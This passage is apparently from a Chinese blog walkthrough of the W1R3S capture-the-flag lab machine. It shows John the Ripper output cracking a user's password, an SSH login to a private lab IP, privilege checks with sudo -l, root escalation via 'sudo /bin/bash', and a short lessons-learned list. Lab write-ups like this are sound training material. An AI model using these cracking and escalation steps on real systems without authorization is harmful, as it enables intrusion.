Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
computer (w1r3s)
2g 0:00:00:01 DONE 2/3 (2023-01-17 19:40) 1.149g/s 1759p/s 1760c/s 1760C/s 123456..john
Use the "--show" option to display all of the cracked passwords reliably

www-data (www-data)

computer (w1r3s)

这里直接尝试ssh登录

0x07 获得初级权限

ssh w1r3s@192.168.63.132

密码:computer

登录成功

查看权限:

whoami
uname -a   #查看信息
sudo -l #查看当前目录权限

结果如下:

w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S.localdomain:

(ALL : ALL) ALL

说明有所有权限

0x08 sudo 提权

sudo /bin/bash

成功获取root权限

回到root根目录,获取flag

红队笔记_w1r3s

0x09 总结

  • 信息收集收集完整
  • 各个阶段时间不要太长
  • 攻击的过程需要找不同方面
  • 编码问题和请求方式问题可能会影响结果


标签:暂无标签
版权属于:Jtripper 所有,转载请注明文章来源。

本文链接: https://www.jtripperbacaf.com/index.php/archives/59/

下一篇
外挂基础
赞 (0)

评论区

发表评论

24+6=?

暂无评论,要不来一发?

回到顶部